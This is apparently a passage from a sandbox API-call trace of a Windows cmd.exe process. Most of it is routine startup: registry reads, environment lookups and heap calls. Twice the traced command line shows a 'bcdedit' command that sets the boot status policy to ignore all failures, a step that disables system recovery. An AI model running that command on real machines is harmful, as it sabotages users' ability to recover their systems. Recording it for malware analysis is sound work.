lpMode=0x4ab7e198) returned 1 [0202.756] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.756] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.756] GetEnvironmentStringsW () returned 0x188b80* [0202.756] GetProcessHeap () returned 0x170000 [0202.756] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xa7c) returned 0x189610 [0202.757] FreeEnvironmentStringsW (penv=0x188b80) returned 1 [0202.757] GetProcessHeap () returned 0x170000 [0202.757] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x8) returned 0x188a00 [0202.757] GetEnvironmentStringsW () returned 0x188b80* [0202.757] GetProcessHeap () returned 0x170000 [0202.757] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xa7c) returned 0x18a0a0 [0202.757] FreeEnvironmentStringsW (penv=0x188b80) returned 1 [0202.757] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8a8 | out: phkResult=0x16e8a8*=0x44) returned 0x0 [0202.757] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x0, lpData=0x16e8c0*=0x18, lpcbData=0x16e8a4*=0x1000) returned 0x2 [0202.757] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x1, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.757] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x0, lpData=0x16e8c0*=0x1, lpcbData=0x16e8a4*=0x1000) returned 0x2 [0202.757] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x0, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.757] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x40, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.757] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x40, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.757] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x0, lpData=0x16e8c0*=0x40, lpcbData=0x16e8a4*=0x1000) returned 0x2 [0202.757] RegCloseKey (hKey=0x44) returned 0x0 [0202.758] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e8a8 | out: phkResult=0x16e8a8*=0x44) returned 0x0 [0202.758] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x0, lpData=0x16e8c0*=0x40, lpcbData=0x16e8a4*=0x1000) returned 0x2 [0202.758] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x1, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.758] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x0, lpData=0x16e8c0*=0x1, lpcbData=0x16e8a4*=0x1000) returned 0x2 [0202.758] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x0, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.758] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x9, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.758] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x4, lpData=0x16e8c0*=0x9, lpcbData=0x16e8a4*=0x4) returned 0x0 [0202.758] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e8a0, lpData=0x16e8c0, lpcbData=0x16e8a4*=0x1000 | out: lpType=0x16e8a0*=0x0, lpData=0x16e8c0*=0x9, lpcbData=0x16e8a4*=0x1000) returned 0x2 [0202.758] RegCloseKey (hKey=0x44) returned 0x0 [0202.758] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae1a5 [0202.758] srand (_Seed=0x5f1ae1a5) [0202.758] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 2495304|bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0202.758] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 2495304|bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0202.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.759] GetProcessHeap () returned 0x170000 [0202.759] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x218) returned 0x18ab30 [0202.759] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ab40, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.759] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.759] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.759] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.759] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.759] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.759] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.759] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.759] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.759] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.759] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.759] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.759] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.759] GetProcessHeap () returned 0x170000 [0202.759] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x189610 | out: hHeap=0x170000) returned 1 [0202.759] GetEnvironmentStringsW () returned 0x188b80* [0202.760] GetProcessHeap () returned 0x170000 [0202.760] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xa94) returned 0x18ad50 [0202.760] FreeEnvironmentStringsW (penv=0x188b80) returned 1 [0202.760] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.760] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.760] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.760] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.760] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.760] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.760] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.760] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.760] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.760] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.760] GetProcessHeap () returned 0x170000 [0202.760] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x38) returned 0x1865b0 [0202.760] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f6b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x16f6b0, lpFilePart=0x16f690 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x16f690*="system32") returned 0x13 [0202.760] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0202.761] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x16f3c0 | out: lpFindFileData=0x16f3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Windows", cAlternateFileName="")) returned 0x18b7f0 [0202.761] FindClose (in: hFindFile=0x18b7f0 | out: hFindFile=0x18b7f0) returned 1 [0202.761] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x16f3c0 | out: lpFindFileData=0x16f3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="System32", cAlternateFileName="")) returned 0x18b7f0 [0202.761] FindClose (in: hFindFile=0x18b7f0 | out: hFindFile=0x18b7f0) returned 1 [0202.761] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0202.761] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0202.761] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0202.762] GetProcessHeap () returned 0x170000 [0202.762] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x18ad50 | out: hHeap=0x170000) returned 1 [0202.762] GetEnvironmentStringsW () returned 0x18ad50* [0202.762] GetProcessHeap () returned 0x170000 [0202.762] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xac4) returned 0x188b80 [0202.762] FreeEnvironmentStringsW (penv=0x18ad50) returned 1 [0202.762] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0202.762] GetProcessHeap () returned 0x170000 [0202.762] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x1865b0 | out: hHeap=0x170000) returned 1 [0202.762] GetProcessHeap () returned 0x170000 [0202.762] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x4016) returned 0x18ad50 [0202.763] GetProcessHeap () returned 0x170000 [0202.763] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xa4) returned 0x189650 [0202.763] GetProcessHeap () returned 0x170000 [0202.763] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x18ad50 | out: hHeap=0x170000) returned 1 [0202.763] GetConsoleOutputCP () returned 0x1b5 [0202.763] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0202.763] GetUserDefaultLCID () returned 0x409 [0202.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab87b50, cchData=8 | out: lpLCData=":") returned 2 [0202.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f7c0, cchData=128 | out: lpLCData="0") returned 2 [0202.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f7c0, cchData=128 | out: lpLCData="0") returned 2 [0202.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f7c0, cchData=128 | out: lpLCData="1") returned 2 [0202.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab9a740, cchData=8 | out: lpLCData="/") returned 2 [0202.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab87b40, cchData=8 | out: lpLCData=".") returned 2 [0202.765] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0202.765] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.766] GetProcessHeap () returned 0x170000 [0202.766] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x0, Size=0x20c) returned 0x189770 [0202.766] GetConsoleTitleW (in: lpConsoleTitle=0x189770, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.766] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0202.766] GetProcAddress (hModule=0x76f60000, lpProcName="CopyFileExW") returned 0x76f723d0 [0202.766] GetProcAddress (hModule=0x76f60000, lpProcName="IsDebuggerPresent") returned 0x76f68290 [0202.766] GetProcAddress (hModule=0x76f60000, lpProcName="SetConsoleInputExeNameW") returned 0x76f717e0 [0202.767] GetProcessHeap () returned 0x170000 [0202.767] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x4012) returned 0x18ad50 [0202.767] GetProcessHeap () returned 0x170000 [0202.767] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x18ad50 | out: hHeap=0x170000) returned 1 [0202.767] _wcsicmp (_String1="title", _String2=")") returned 75 [0202.767] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0202.767] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0202.768] _wcsicmp (_String1="IF", _String2="title") returned -11 [0202.768] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0202.768] _wcsicmp (_String1="REM", _String2="title") returned -2 [0202.768] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0202.768] GetProcessHeap () returned 0x170000 [0202.768] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xb0) returned 0x189990 [0202.768] GetProcessHeap () returned 0x170000 [0202.768] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x1c) returned 0x1846b0 [0202.768] GetProcessHeap () returned 0x170000 [0202.768] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x22) returned 0x1846e0 [0202.769] GetProcessHeap () returned 0x170000 [0202.769] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xb0) returned 0x189a50 [0202.769] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0202.769] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0202.769] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0202.770] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0202.770] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0202.770] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0202.770] GetProcessHeap () returned 0x170000 [0202.770] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xb0) returned 0x189b10 [0202.770] GetProcessHeap () returned 0x170000 [0202.770] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x20) returned 0x184710 [0202.771] GetProcessHeap () returned 0x170000 [0202.771] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x76) returned 0x189bd0 [0202.772] GetProcessHeap () returned 0x170000 [0202.772] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x48) returned 0x189c50 [0202.772] _pipe (in: _PtHandles=0x189c60, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x189c60) returned 0 [0202.773] _dup (_FileHandle=1) returned 5 [0202.773] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0202.774] _close (_FileHandle=4) returned 0 [0202.774] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0202.774] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0202.774] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0202.774] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0202.774] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0202.774] _wcsicmp (_String1="title", _String2="CD") returned 17 [0202.774] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0202.775] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0202.775] _wcsicmp (_String1="title", _String2="REN") returned 2 [0202.775] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0202.775] _wcsicmp (_String1="title", _String2="SET") returned 1 [0202.775] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0202.775] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0202.775] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0202.775] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0202.775] _wcsicmp (_String1="title", _String2="MD") returned 7 [0202.775] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0202.775] _wcsicmp (_String1="title", _String2="RD") returned 2 [0202.775] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0202.775] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0202.775] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0202.775] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0202.775] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0202.775] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0202.775] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0202.775] _wcsicmp (_String1="title", _String2="VER") returned -2 [0202.775] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0202.775] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0202.775] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0202.775] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0202.775] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0202.775] GetProcessHeap () returned 0x170000 [0202.775] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x4010) returned 0x18ad50 [0202.775] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0202.775] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0202.776] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0202.776] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0202.776] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0202.776] _wcsicmp (_String1="title", _String2="CD") returned 17 [0202.776] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0202.776] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0202.776] _wcsicmp (_String1="title", _String2="REN") returned 2 [0202.776] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0202.776] _wcsicmp (_String1="title", _String2="SET") returned 1 [0202.776] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0202.776] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0202.776] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0202.776] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0202.776] _wcsicmp (_String1="title", _String2="MD") returned 7 [0202.776] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0202.776] _wcsicmp (_String1="title", _String2="RD") returned 2 [0202.776] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0202.776] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0202.776] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0202.776] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0202.776] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0202.776] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0202.776] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0202.776] _wcsicmp (_String1="title", _String2="VER") returned -2 [0202.776] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0202.776] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0202.776] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0202.776] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0202.776] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0202.777] GetProcessHeap () returned 0x170000 [0202.777] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xb0) returned 0x189ca0 [0202.777] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.777] GetProcessHeap () returned 0x170000 [0202.777] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x28) returned 0x184740 [0202.777] GetProcessHeap () returned 0x170000 [0202.777] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x218) returned 0x189d60 [0202.777] GetProcessHeap () returned 0x170000 [0202.777] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x7c) returned 0x189f80 [0202.777] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0202.777] GetProcessHeap () returned 0x170000 [0202.777] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x420) returned 0x18ed70 [0202.777] SetErrorMode (uMode=0x0) returned 0x1 [0202.777] SetErrorMode (uMode=0x1) returned 0x0 [0202.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x18ed80, lpFilePart=0x16f320 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x16f320*="system32") returned 0x13 [0202.778] SetErrorMode (uMode=0x1) returned 0x1 [0202.778] GetProcessHeap () returned 0x170000 [0202.778] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x18ed70, Size=0x48) returned 0x18ed70 [0202.778] GetProcessHeap () returned 0x170000 [0202.778] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x18ed70) returned 0x48 [0202.778] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0202.778] GetProcessHeap () returned 0x170000 [0202.778] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x3e) returned 0x18ee00 [0202.778] GetProcessHeap () returned 0x170000 [0202.778] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x68) returned 0x18a010 [0202.778] GetProcessHeap () returned 0x170000 [0202.778] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x18a010, Size=0x3e) returned 0x18a010 [0202.778] GetProcessHeap () returned 0x170000 [0202.778] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x18a010) returned 0x3e [0202.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.779] GetProcessHeap () returned 0x170000 [0202.779] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0xe8) returned 0x18fdd0 [0202.783] GetProcessHeap () returned 0x170000 [0202.783] RtlReAllocateHeap (Heap=0x170000, Flags=0x0, Ptr=0x18fdd0, Size=0x7e) returned 0x18fdd0 [0202.783] GetProcessHeap () returned 0x170000 [0202.783] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x18fdd0) returned 0x7e [0202.785] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.785] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x16f090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f090) returned 0x18fe60 [0202.785] GetProcessHeap () returned 0x170000 [0202.785] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x0, Size=0x28) returned 0x184770 [0202.785] FindClose (in: hFindFile=0x18fe60 | out: hFindFile=0x18fe60) returned 1 [0202.785] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0202.785] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0202.785] GetConsoleTitleW (in: lpConsoleTitle=0x16f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.860] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f398, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f358 | out: lpAttributeList=0x16f398, lpSize=0x16f358) returned 1 [0202.860] UpdateProcThreadAttribute (in: lpAttributeList=0x16f398, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f348, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f398, lpPreviousValue=0x0) returned 1 [0202.860] GetStartupInfoW (in: lpStartupInfo=0x16f4b0 | out: lpStartupInfo=0x16f4b0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0202.860] GetProcessHeap () returned 0x170000 [0202.860] RtlAllocateHeap (HeapHandle=0x170000, Flags=0x8, Size=0x20) returned 0x18fe90 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.860] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 